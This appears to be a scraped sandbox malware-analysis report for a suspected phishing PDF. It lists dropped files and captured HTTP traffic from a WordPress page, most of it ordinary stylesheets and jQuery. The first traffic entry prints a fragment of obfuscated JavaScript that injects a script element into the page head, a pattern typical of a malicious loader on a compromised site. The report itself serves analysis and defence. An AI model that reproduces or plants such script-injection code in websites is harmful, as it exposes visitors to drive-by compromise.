2025-01-15 02:37:08 UTC	3732	IN	Data Raw: 41 74 74 72 69 62 75 74 65 27 5d 28 27 63 72 6f 73 73 6f 72 69 67 69 6e 27 2c 27 61 6e 6f 6e 79 6d 6f 75 73 27 29 2c 6a 6b 5b 27 73 65 74 41 74 74 72 69 62 75 74 65 27 5d 28 27 63 68 61 72 73 65 74 27 2c 27 55 54 46 2d 38 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 27 5d 28 27 68 65 61 64 27 29 5b 30 78 30 5d 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 6a 6b 29 2c 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 3f 6a 6b 5b 27 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 28 27 63 6f 6d 70 6c 65 74 65 27 3d 3d 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 7c 7c 27 6c 6f 61 64 65 64 27 3d 3d 6a 6b 5b 27 72 65 61 64 79 53 74 61 74 65 27 5d 29 26 26 Data Ascii: Attribute']('crossorigin','anonymous'),jk['setAttribute']('charset','UTF-8'),document['getElementsByTagName']('head')[0x0]['appendChild'](jk),jk['readyState']?jk['onreadystatechange']=function(){('complete'==jk['readyState']\|\|'loaded'==jk['readyState'])&&

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Reversed order 24-25.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\01-14-2025 10-06-38.jpg

C:\Users\Public\Downloads\01-14-2025 10-48-09.jpg

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\9fe85139-efb0-4cd3-b9ad-81380b74dbe7.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250115023635Z-152.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

Windows Analysis Report
Reversed order 24-25.pdf

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:07 UTC	644	OUT	GET /wp-content/plugins/translatepress-multilingual/assets/css/trp-floater-language-switcher.css?ver=2.8.7 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:08 UTC	414	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:07 GMT Content-Type: text/css Content-Length: 22525 Last-Modified: Sat, 26 Oct 2024 07:40:32 GMT Connection: close Vary: Accept-Encoding ETag: "671c9cf0-57fd" Expires: Thu, 15 Jan 2026 02:37:07 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:08 UTC	15970	IN	Data Raw: 2e 74 72 70 2d 6c 61 6e 67 75 61 67 65 2d 73 77 69 74 63 68 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2e 74 72 70 2d 66 6c 6f 61 74 65 72 2d 6c 73 2d 6e 61 6d 65 73 2e 74 72 70 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2e 74 72 70 2d 63 6f 6c 6f 72 2d 6c 69 67 68 74 20 7b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0a 7d 0a 2e 74 72 70 2d 6c 61 6e 67 75 61 67 65 2d 73 77 69 74 63 68 65 72 2d 63 6f 6e 74 61 69 6e 65 72 2e 74 72 70 2d 66 6c 6f 61 74 65 72 2d 6c 73 2d 6e 61 6d 65 73 2e 74 72 70 2d 62 6f 74 74 6f 6d 2d 72 69 67 68 74 2e 74 72 70 2d 63 6f 6c 6f 72 2d 64 61 72 6b 20 7b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 32 30 30 70 78 3b 0a 7d 0a 2e 74 72 70 2d 6c 61 6e 67 75 61 67 65 2d 73 77 69 74 63 68 65 72 2d 63 6f 6e 74 61 69 6e Data Ascii: .trp-language-switcher-container.trp-floater-ls-names.trp-bottom-right.trp-color-light { min-width: 200px;}.trp-language-switcher-container.trp-floater-ls-names.trp-bottom-right.trp-color-dark { min-width: 200px;}.trp-language-switcher-contain
2025-01-15 02:37:08 UTC	6555	IN	Data Raw: 20 33 30 70 78 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 31 70 78 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 7d 0a 0a 0a 2e 74 72 70 2d 63 6f 6c 6f 72 2d 6c 69 67 68 74 2e 74 72 70 2d 70 6f 77 65 72 65 64 62 79 20 23 74 72 70 2d 66 6c 6f 61 74 65 72 2d 6c 73 2d 6c 61 6e 67 75 61 67 65 2d 6c 69 73 74 20 23 74 72 70 2d 66 6c 6f 61 74 65 72 2d 70 6f 77 65 72 65 64 62 79 20 61 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 35 38 45 39 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 2e 74 72 70 2d 63 6f 6c 6f 72 2d 64 61 72 6b 2e 74 72 70 2d 70 6f 77 65 72 65 64 62 79 20 23 74 72 70 2d 66 6c 6f 61 74 65 72 2d 6c 73 2d 6c 61 6e 67 75 61 67 Data Ascii: 30px; line-height: 11px; text-decoration: underline;}.trp-color-light.trp-poweredby #trp-floater-ls-language-list #trp-floater-poweredby a{ color: #3858E9; text-decoration: none;}.trp-color-dark.trp-poweredby #trp-floater-ls-languag

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:07 UTC	628	OUT	GET /wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.15.0 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:08 UTC	414	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:08 GMT Content-Type: text/css Content-Length: 19128 Last-Modified: Thu, 04 Aug 2022 07:37:28 GMT Connection: close Vary: Accept-Encoding ETag: "62eb7738-4ab8" Expires: Thu, 15 Jan 2026 02:37:08 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:08 UTC	15970	IN	Data Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 20 2d 20 76 35 2e 31 35 2e 30 20 2d 20 33 30 2d 30 31 2d 32 30 32 32 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 65 69 63 6f 6e 73 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 65 6f 74 3f 35 2e 31 35 2e 30 29 3b 73 72 63 3a 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 65 6f 74 3f 35 2e 31 35 2e 30 23 69 65 66 69 78 29 20 66 6f 72 6d 61 74 28 22 65 6d 62 65 64 64 65 64 2d 6f 70 65 6e 74 79 70 65 22 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 77 6f 66 66 32 3f 35 2e 31 35 2e 30 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 75 72 6c 28 2e 2e 2f 66 6f 6e 74 73 2f 65 69 63 6f 6e 73 2e 77 6f 66 Data Ascii: /! elementor-icons - v5.15.0 - 30-01-2022 /@font-face{font-family:eicons;src:url(../fonts/eicons.eot?5.15.0);src:url(../fonts/eicons.eot?5.15.0#iefix) format("embedded-opentype"),url(../fonts/eicons.woff2?5.15.0) format("woff2"),url(../fonts/eicons.wof
2025-01-15 02:37:08 UTC	3158	IN	Data Raw: 7d 2e 65 69 63 6f 6e 2d 65 78 70 6f 72 74 2d 6b 69 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 30 27 7d 2e 65 69 63 6f 6e 2d 69 6d 70 6f 72 74 2d 6b 69 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 31 27 7d 2e 65 69 63 6f 6e 2d 6c 6f 74 74 69 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 32 27 7d 2e 65 69 63 6f 6e 2d 70 72 6f 64 75 63 74 73 2d 61 72 63 68 69 76 65 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 33 27 7d 2e 65 69 63 6f 6e 2d 73 69 6e 67 6c 65 2d 70 72 6f 64 75 63 74 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 34 27 7d 2e 65 69 63 6f 6e 2d 64 69 73 61 62 6c 65 2d 74 72 61 73 68 2d 6f 3a 62 65 66 6f 72 65 7b 63 6f 6e 74 65 6e 74 3a 27 5c 65 39 37 Data Ascii: }.eicon-export-kit:before{content:'\e970'}.eicon-import-kit:before{content:'\e971'}.eicon-lottie:before{content:'\e972'}.eicon-products-archive:before{content:'\e973'}.eicon-single-product:before{content:'\e974'}.eicon-disable-trash-o:before{content:'\e97

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:08 UTC	604	OUT	GET /wp-content/uploads/elementor/css/post-3049.css?ver=1736408609 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:08 UTC	412	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:08 GMT Content-Type: text/css Content-Length: 1120 Last-Modified: Thu, 09 Jan 2025 07:43:29 GMT Connection: close Vary: Accept-Encoding ETag: "677f7e21-460" Expires: Thu, 15 Jan 2026 02:37:08 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:08 UTC	1120	IN	Data Raw: 2e 65 6c 65 6d 65 6e 74 6f 72 2d 6b 69 74 2d 33 30 34 39 7b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 70 72 69 6d 61 72 79 3a 23 36 34 43 37 46 31 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 73 65 63 6f 6e 64 61 72 79 3a 23 35 34 35 39 35 46 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 74 65 78 74 3a 23 37 41 37 41 37 41 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 3a 23 36 31 43 45 37 30 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 52 6f 62 6f 74 6f 22 3b 2d 2d 65 2d 67 6c 6f 62 61 6c 2d 74 79 70 6f 67 72 61 70 68 79 2d 70 72 69 6d 61 72 79 2d 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 2d 2d 65 2d 67 6c 6f 62 Data Ascii: .elementor-kit-3049{--e-global-color-primary:#64C7F1;--e-global-color-secondary:#54595F;--e-global-color-text:#7A7A7A;--e-global-color-accent:#61CE70;--e-global-typography-primary-font-family:"Roboto";--e-global-typography-primary-font-weight:600;--e-glob

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:08 UTC	618	OUT	GET /wp-content/plugins/elementor-pro/assets/css/frontend-lite.min.css?ver=3.7.3 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: text/css,/;q=0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:09 UTC	414	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:08 GMT Content-Type: text/css Content-Length: 11530 Last-Modified: Thu, 04 Aug 2022 07:37:32 GMT Connection: close Vary: Accept-Encoding ETag: "62eb773c-2d0a" Expires: Thu, 15 Jan 2026 02:37:08 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:09 UTC	11530	IN	Data Raw: 2f 2a 21 20 65 6c 65 6d 65 6e 74 6f 72 2d 70 72 6f 20 2d 20 76 33 2e 37 2e 33 20 2d 20 33 31 2d 30 37 2d 32 30 32 32 20 2a 2f 0a 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 7b 77 69 6c 6c 2d 63 68 61 6e 67 65 3a 74 72 61 6e 73 66 6f 72 6d 7d 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 2d 7a 6f 6f 6d 2d 69 6e 3a 68 6f 76 65 72 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2c 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 2d 74 72 61 6e 73 66 6f 72 6d 2d 7a 6f 6f 6d 2d 6f 75 74 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 62 67 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 32 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 2e 32 29 Data Ascii: /! elementor-pro - v3.7.3 - 31-07-2022 /.elementor-bg-transform .elementor-bg{will-change:transform}.elementor-bg-transform-zoom-in:hover .elementor-bg,.elementor-bg-transform-zoom-out .elementor-bg{-webkit-transform:scale(1.2);-ms-transform:scale(1.2)

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:08 UTC	574	OUT	GET /wp-includes/js/jquery/jquery.min.js?ver=3.6.0 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 02:37:09 UTC	429	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 15 Jan 2025 02:37:08 GMT Content-Type: application/javascript Content-Length: 89521 Last-Modified: Mon, 28 Feb 2022 09:02:21 GMT Connection: close Vary: Accept-Encoding ETag: "621c8f9d-15db1" Expires: Thu, 15 Jan 2026 02:37:08 GMT Cache-Control: max-age=31536000 Strict-Transport-Security: max-age=31536000 Referrer-Policy: no-referrer-when-downgrade Accept-Ranges: bytes
2025-01-15 02:37:09 UTC	15955	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 Data Ascii: /! jQuery v3.6.0 \| (c) OpenJS Foundation and other contributors \| jquery.org/license /!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
2025-01-15 02:37:09 UTC	16384	IN	Data Raw: 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 79 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69 66 28 75 3d 5b 6d 3f 63 2e 66 69 72 73 74 43 68 69 6c 64 3a 63 2e 6c 61 73 74 43 68 69 6c 64 5d 2c 6d 26 26 70 29 7b 64 3d 28 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 63 29 5b 53 5d Data Ascii: arentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(y){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}if(u=[m?c.firstChild:c.lastChild],m&&p){d=(s=(r=(i=(o=(a=c)[S]
2025-01-15 02:37:09 UTC	16384	IN	Data Raw: 22 6c 6f 61 64 22 2c 42 29 29 3b 76 61 72 20 24 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 61 29 7b 76 61 72 20 73 3d 30 2c 75 3d 65 2e 6c 65 6e 67 74 68 2c 6c 3d 6e 75 6c 6c 3d 3d 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 3d 77 28 6e 29 29 66 6f 72 28 73 20 69 6e 20 69 3d 21 30 2c 6e 29 24 28 65 2c 74 2c 73 2c 6e 5b 73 5d 2c 21 30 2c 6f 2c 61 29 3b 65 6c 73 65 20 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 28 69 3d 21 30 2c 6d 28 72 29 7c 7c 28 61 3d 21 30 29 2c 6c 26 26 28 61 3f 28 74 2e 63 61 6c 6c 28 65 2c 72 29 2c 74 3d 6e 75 6c 6c 29 3a 28 6c 3d 74 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 6c 2e 63 61 6c 6c 28 53 28 65 29 2c 6e 29 7d 29 29 2c 74 29 29 66 6f 72 28 3b 73 3c 75 3b 73 2b 2b Data Ascii: "load",B));var $=function(e,t,n,r,i,o,a){var s=0,u=e.length,l=null==n;if("object"===w(n))for(s in i=!0,n)$(e,t,s,n[s],!0,o,a);else if(void 0!==r&&(i=!0,m(r)\|\|(a=!0),l&&(a?(t.call(e,r),t=null):(l=t,t=function(e,t,n){return l.call(S(e),n)})),t))for(;s<u;s++
2025-01-15 02:37:09 UTC	16384	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 2c 63 3d 65 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 2c 66 3d 69 65 28 65 29 3b 69 66 28 21 28 79 2e 6e 6f 43 6c 6f 6e 65 43 68 65 63 6b 65 64 7c 7c 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 26 26 31 31 21 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 29 29 66 6f 72 28 61 3d 76 65 28 63 29 2c 72 3d 30 2c 69 3d 28 6f 3d 76 65 28 65 29 29 2e 6c 65 6e 67 74 68 3b 72 3c 69 3b 72 2b 2b 29 73 3d 6f 5b 72 5d 2c 75 3d 61 5b 72 5d 2c 76 6f 69 64 20 30 2c 22 69 6e 70 75 74 22 3d 3d 3d 28 6c 3d 75 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 Data Ascii: function(e){return e},clone:function(e,t,n){var r,i,o,a,s,u,l,c=e.cloneNode(!0),f=ie(e);if(!(y.noCloneChecked\|\|1!==e.nodeType&&11!==e.nodeType\|\|S.isXMLDoc(e)))for(a=ve(c),r=0,i=(o=ve(e)).length;r<i;r++)s=o[r],u=a[r],void 0,"input"===(l=u.nodeName.toLowerC
2025-01-15 02:37:09 UTC	16384	IN	Data Raw: 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 2c 6e 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 65 6c 65 63 74 22 29 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 6f 70 74 69 6f 6e 22 29 29 2c 74 74 2e 74 79 70 65 3d 22 63 68 65 63 6b 62 6f 78 22 2c 79 2e 63 68 65 63 6b 4f 6e 3d 22 22 21 3d 3d 74 74 2e 76 61 6c 75 65 2c 79 2e 6f 70 74 53 65 6c 65 63 74 65 64 3d 6e 74 2e 73 65 6c 65 63 74 65 64 2c 28 74 74 3d 45 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 76 61 6c 75 65 3d 22 74 22 2c 74 74 2e 74 79 70 65 3d 22 72 61 64 69 6f 22 2c 79 2e 72 61 64 69 6f 56 61 6c 75 65 3d 22 74 22 3d 3d 3d 74 74 2e 76 61 6c 75 65 3b 76 61 72 20 63 74 2c 66 74 Data Ascii: E.createElement("input"),nt=E.createElement("select").appendChild(E.createElement("option")),tt.type="checkbox",y.checkOn=""!==tt.value,y.optSelected=nt.selected,(tt=E.createElement("input")).value="t",tt.type="radio",y.radioValue="t"===tt.value;var ct,ft
2025-01-15 02:37:09 UTC	8030	IN	Data Raw: 74 68 69 73 7d 7d 29 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 68 69 64 64 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 28 65 29 7d 2c 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2e 76 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 2e 6f 66 66 73 65 74 57 69 64 74 68 7c 7c 65 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7c 7c 65 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 29 7d 2c 53 2e 61 6a 61 78 53 65 74 74 69 6e 67 73 2e 78 68 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6e 65 77 20 43 2e 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 7d 63 61 74 63 68 28 65 29 7b 7d 7d 3b 76 61 Data Ascii: this}}),S.expr.pseudos.hidden=function(e){return!S.expr.pseudos.visible(e)},S.expr.pseudos.visible=function(e){return!!(e.offsetWidth\|\|e.offsetHeight\|\|e.getClientRects().length)},S.ajaxSettings.xhr=function(){try{return new C.XMLHttpRequest}catch(e){}};va

Timestamp	Bytes transferred	Direction	Data
2025-01-15 02:37:08 UTC	582	OUT	GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 HTTP/1.1 Host: www.woluntech.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://www.woluntech.com/oders-pdf/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
